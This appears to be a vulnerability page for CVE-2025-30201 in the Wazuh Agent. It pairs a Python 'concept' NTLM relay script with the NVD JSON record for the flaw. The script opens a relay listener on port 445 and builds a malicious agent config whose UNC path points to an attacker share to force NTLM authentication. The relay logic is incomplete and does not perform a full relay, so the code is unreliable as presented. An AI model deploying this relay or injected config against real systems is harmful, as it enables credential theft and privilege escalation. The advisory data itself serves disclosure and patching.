CVE-2025-30201

# CVE-2025-30201 NTLM Relay PoC (Concept) # Attacker's NTLM relay server setup import socket import struct from impacket import ntlm def start_relay_server(): """Start NTLM relay server to capture and relay authentication""" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(('0.0.0.0', 445)) server.listen(5) print('[+] NTLM Relay Server listening on port 445') while True: conn, addr = server.accept() print(f'[*] Connection received from {addr}') # Capture NTLM authentication ntlm_negotiate = conn.recv(1024) # Relay to target (e.g., Wazuh server or DC) target = 'target_server' relay_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) relay_conn.connect((target, 445)) # Forward NTLM messages relay_conn.sendall(ntlm_negotiate) # Execute commands with relayed credentials # ... (full exploit requires Wazuh-specific knowledge) # Malicious UNC path injection example malicious_config = ''' <ossec_config> <syscheck> <directories check_all="yes">\\attacker\malicious\share</directories> </syscheck> </ossec_config> ''' print('[+] Malicious config generated for Wazuh Agent injection')

{"cve": {"id": "CVE-2025-30201", "sourceIdentifier": "[email protected]", "published": "2025-11-21T19:15:50.293", "lastModified": "2025-12-02T16:45:54.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to version 4.13.0, a vulnerability in Wazuh Agent allows authenticated attackers to force NTLM authentication through malicious UNC paths in various agent configuration settings, potentially leading NTLM relay attacks that would result privilege escalation and remote code execution. This issue has been patched in version 4.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-294"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.13.0", "matchCriteriaId": "6248EA61-D178-48E6-B2E3-EA37BFEDC305"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/commit/688972da589e5d40d2a81bcd738240303a3dc45a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/wazuh/wazuh/pull/30060", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-x697-jf34-gp5x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}